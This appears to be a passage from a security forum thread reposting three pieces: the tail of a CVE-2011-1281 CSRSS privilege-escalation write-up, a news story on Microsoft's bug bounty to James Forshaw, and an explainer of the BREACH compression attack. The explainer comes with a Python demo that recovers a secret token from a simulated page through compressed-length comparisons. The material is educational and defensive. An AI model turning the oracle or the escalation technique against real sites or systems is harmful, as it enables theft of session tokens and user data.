     +-> utilman.exe /start [USER]
      +–> narrator.exe /UM [USER]

Then we create USER objects like a MessageBox with an overlong title (32 KB). But utilman (system) doesn’t share the win32k section with other processes at all times. After trying different unsuccessful methods, I decided to contact j00ru, who gave me the solution. We can inject USER objects into utilman (system) if another user (regardless of his privileges) is logged on to the machine at the same time. At this moment, I haven’t found an explanation of this behaviour. I think it’s something related to Desktop/WinStation/Session; if you have some idea, tell me.

Source of the PoC: Index of /prog/blog/allocConsole

Thanks to j00ru for his help and all the knowledge shared on his blog, HITB and so on!

Sursa: CVE-2011-1281 Privilege escalation in CSRSS proof of concept
-
Microsoft pays Australian hacker $100,000 for finding security holes

Ben Grubb and Jim Finkle
Date October 9, 2013 - 1:11PM

Winning: James Forshaw of security firm Context. Photo: Context

Microsoft is paying a well-known Australian hacking expert more than $100,000 for finding security holes in its software, one of the largest bounties awarded to date by a tech company. The company also released a much anticipated update to Internet Explorer, which it said fixes a bug that made users of the browser vulnerable to remote attack.

James Forshaw, who heads vulnerability research at Melbourne-based consulting firm Context Information Security, won Microsoft's first $US100,000 ($106,000) bounty for identifying a new "exploitation technique" in Windows, which will allow it to develop defences against an entire class of attacks, the company said.

Generous reward: Microsoft. Photo: Bloomberg

Forshaw is among the many "white hat" hackers who hack for good and get rewarded for their efforts. Companies such as Apple and Facebook have hall of fame pages on their websites to recognise hackers, and some companies even pay them.

Forshaw, who is currently travelling to attend a security conference, earned another $US9400 for identifying security bugs in a preview release of Microsoft's Internet Explorer 11 browser, Katie Moussouris, senior security strategist with Microsoft Security Response Centre, said in a blog post.

"Over the past decade working in secure development and research, I have discovered many interesting security vulnerabilities with a heavy focus of complex logic bugs," Forshaw said. "I'm keenly interested in the intellectual puzzle of finding novel exploitation techniques and the creativity it requires."

To find his winning entry, Forshaw studied the mitigations available today and after brainstorming identified a few potential angles. "Not all were viable but after some persistence I was finally successful."

He said receiving recognition for his entry was "exciting" to him and his employer. "It also gives me the satisfaction that I am contributing to improving the security of both Microsoft's and Context's customers."

Microsoft unveiled the reward programs four months ago to bolster efforts to prevent sophisticated attackers from subverting new security technologies in its software, which runs on the majority of the world's PCs.

Forshaw has been credited with identifying several dozen software security bugs. He was awarded a large bounty from Hewlett-Packard for identifying a way to "pwn", or take ownership of, Oracle's Java software in a high-profile contest known as Pwn2Own (pronounced "pown to own").

Microsoft also released an automatic update to Internet Explorer on Tuesday afternoon to fix a security bug that it first disclosed last month. Researchers say hackers initially exploited that flaw to launch attacks on companies in Asia in an operation that cyber security firm FireEye has dubbed DeputyDog.

Marc Maiffret, chief technology officer of the cyber security firm BeyondTrust, said the vulnerability was later more broadly used after Microsoft's disclosure of the issue brought it to the attention of cybercriminals. He is advising PC users to immediately install the update to Internet Explorer, if they do not have their PCs already set to automatically download updates.

"Any time they patch something that has already been used [to launch attacks] in the wild, then it is critical to apply the patch," Maiffret said.

That vulnerability in Internet Explorer was known as a "zero-day" because Microsoft, the targeted software maker, had zero days' notice to fix the hole when the initial attacks exploiting the bug were discovered. In an active, underground market for "zero day" vulnerabilities, criminal groups and governments sometimes pay $US1 million or more to hackers who identify such bugs.

Microsoft's reward is slightly more generous than that of Yahoo!, which recently offered a security researcher a $US25 voucher to the company's online store for reporting three security flaws. Yahoo later opened up a program, with rewards of up to $US15,000, after security researchers ridiculed the minuscule $US25 prize.

Sursa: Microsoft pays Australian hacker $100,000 for finding security holes
-
The Breach Attack

Rohit T
October 07, 2013

Introduction

Back in 2012, when Juliano Rizzo and Thai Duong announced the CRIME attack, a TLS / SSL compression attack against HTTPS, the ability to recover selected parts of the traffic through side channel attacks was proven. This attack was mitigated by disabling the TLS / SSL level compression for most of the browsers. This year at Black Hat, a new attack called BREACH (browser reconnaissance and exfiltration via adaptive compression of hypertext) was announced and it commanded the attention of the entire industry. This presentation, titled “SSL Gone in 30 seconds,” is not properly understood and hence there seems to be some confusion about how to mitigate the problem. So I felt that this article should give some detailed insight into how notorious the attack is, how it works, how practical it is, and what needs to be done to mitigate it. So let’s have a look.

BREACH Attack

Unlike the previously known attacks, such as BEAST, LUCKY, etc., BREACH is not an attack against TLS; it is basically an attack against HTTP. If you are familiar with the famous Oracle padding attack, BREACH is somewhat easy to understand. A BREACH attack can extract login tokens, email addresses, and other sensitive information from TLS encrypted web traffic in as little as 30 seconds (depending on the number of bytes to be extracted). The attacker just needs to trick the victim into visiting a malicious link to execute the attack.

Before going into the details, let me explain a little bit more about the basic things you need to know. Web pages are generally compressed before the responses are sent out, which is called HTTP compression, primarily to make better use of available bandwidth and to provide greater transmission speeds. The browser usually tells the server (through the “Accept-Encoding” header) what compression methods it supports and the server accordingly compresses the content and sends it across. If the browser does not support any compression then the response is not compressed. The most commonly used compression algorithms are gzip and deflate.

Accept-Encoding: gzip, deflate

When the content arrives, it is uncompressed by the browser and processed. So, basically with SSL-enabled web sites, the content is first compressed, then encrypted and sent. But you can determine the length of this compressed content even when it’s wrapped by SSL.

How Does It Work?

The attack primarily works by taking advantage of the compressed size of the text when there are repetitive terms. Here is a small example that explains how deflate takes advantage of repetitive terms to reduce the compressed size of the response. Consider the search page below, which is present after logging into this site:

http://www.ghadiwala.com/catalogsearch/result/?q=

Observe that the text highlighted in the red box is the username. Now enter any text (say “random”) and click “Search.”

URL: Search results for: 'random' , GhadiWala.com

So you can control the response through the input parameter in the URL. Now imagine that the search term is “Pentesting” (which is the username in this case).

URL: Search results for: 'Pentesting' , GhadiWala.com

Now, when the deflate algorithm is compressing the above response, it finds that the term “Pentesting” is repeated more than once in the response. So, instead of displaying it a second time, the compressor says “this text is found 101 characters ago.” This reduces the size of the compressed output. In other words, by controlling the input search parameter, you can guess the username. How? The compressed size would be least when the search parameter matches the username. This concept is the base for the BREACH attack.

Practical Attack

Now let us see how an attacker would practically exploit this issue and steal any sensitive information. Consider the site below and assume a legitimate user has just signed in.

[before signing in to the application]
[search page, which is accessible after logging in]

As shown in the above figure, also assume that there is some sensitive data in the Search page, for example, a card number. When the user searches for something (say “test”) the following message is displayed.

Now an attacker, using social engineering techniques, could lure this currently signed-in user to click on a link. The link would be a simple html page that has a JavaScript in it that will request searches continuously for search terms “100-1000.” For example, the JavaScript would request the URLs shown below:

http://localhost/demo/Search?p=100
http://localhost/demo/Search?p=101
………
http://localhost/demo/Search?p=10000

The attacker can also get the compressed sizes of the responses for each of these requests. Can you guess why the compressed sizes for each of these responses would differ and can you guess which request would have the smallest compressed size? Below are the requests with the smallest compressed sizes:

http://localhost/demo/Search?p=4545
http://localhost/demo/Search?p=5454
http://localhost/demo/Search?p=4543
http://localhost/demo/Search?p=5433

Below is the explanation of why the above requests have the smallest compressed sizes. Take the first request. Here is the response from the server:

URL: http://localhost/demo/Search?p=4545

As shown above, when the deflate algorithm encounters this, it makes an easy representation of the repetitions and thus results in the smallest compressed size. So by analyzing the compressed size for each of the requests from 100-10000, an attacker can simply deduce what the card number is in this case. The beauty of this attack lies in the fact that we did not decrypt any traffic, but just by analyzing the size of the responses we were able to predict the text.

To summarize in simple steps, for an application to be vulnerable to this BREACH attack, here are the conditions that it must fulfill:
The server should be using HTTP level compression.
There must be a parameter that reflects the input text. (This will be controlled by the attacker.)
The page should contain some sensitive text that would be of interest to the attacker.

Remediation

Turning off HTTP compression would save the day, but that cannot be a possible solution, since all the servers rely on it to effectively manage the bandwidth. Here are some of the other solutions that can be tried:
Protecting the vulnerable pages with a CSRF token.
Adding random bytes to the response to hide the actual compressed length.
Separating the sensitive data from the pages where input text is displayed.

Sursa: The Breach Attack
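The compressed-length oracle described in the post, as an added Python example that is not from the original article: a constructed page reflects the search term in its title and carries a hypothetical logout token, zlib (forced to fixed Huffman codes so that each byte the back-reference covers shows up as exactly one byte of difference) plays the role of the server's deflate, and the "random bytes" remediation from the list above is shown breaking the ranking. The page layout, the token value and the "tok=" prefix are constructed assumptions.

```python
import secrets
import zlib
from typing import Dict

# Constructed sample page (not from the original post): the search term is reflected
# in the <title>, and the same page carries a secret, a hypothetical logout token.
SECRET = "4a7f1"
PREFIX = "tok="          # bytes that precede the secret in the page; the attacker knows them
ALPHABET = "0123456789abcdef"
PAGE = (
    "<html><head><title>Search results for: '{query}'</title></head><body>"
    "<ul><li class=\"item\">no results</li><li class=\"item\">no results</li>"
    "<li class=\"item\">no results</li></ul>"
    "<a href=\"/logout?tok={secret}\">Log out</a>{padding}</body></html>"
)
# Fixed Huffman codes make the oracle exact: every extra byte that DEFLATE can cover
# with an LZ77 back-reference saves one 8-bit literal. With the default dynamic tables
# (what real servers use) the same signal exists but is noisier.
Z_FIXED = getattr(zlib, "Z_FIXED", 4)


def render(query: str, pad: bool = False) -> bytes:
    """Server-side rendering. pad=True appends a comment of random length AND random
    content (a repeated filler character would itself compress away) to mask the length."""
    padding = ""
    if pad:
        padding = "<!-- " + secrets.token_hex(secrets.randbelow(16) + 1) + " -->"
    return PAGE.format(query=query, secret=SECRET, padding=padding).encode()


def compressed_len(query: str, pad: bool = False) -> int:
    """What a network observer sees: the size of the compressed body (TLS hides the
    content of the response, not its length)."""
    comp = zlib.compressobj(level=9, strategy=Z_FIXED)
    return len(comp.compress(render(query, pad)) + comp.flush())


def recover_token(length: int = len(SECRET), pad: bool = False) -> str:
    """Byte-at-a-time recovery: extend the known prefix by each candidate byte and keep
    the one whose response compresses smallest, because the back-reference from the
    secret to the reflected query then covers one more byte."""
    known = ""
    for _ in range(length):
        sizes: Dict[str, int] = {
            c: compressed_len(PREFIX + known + c, pad) for c in ALPHABET
        }
        known += min(sizes, key=sizes.get)
    return known


if __name__ == "__main__":
    print("unpadded:", recover_token())           # recovers 4a7f1
    print("padded:  ", recover_token(pad=True))   # length now varies per response
```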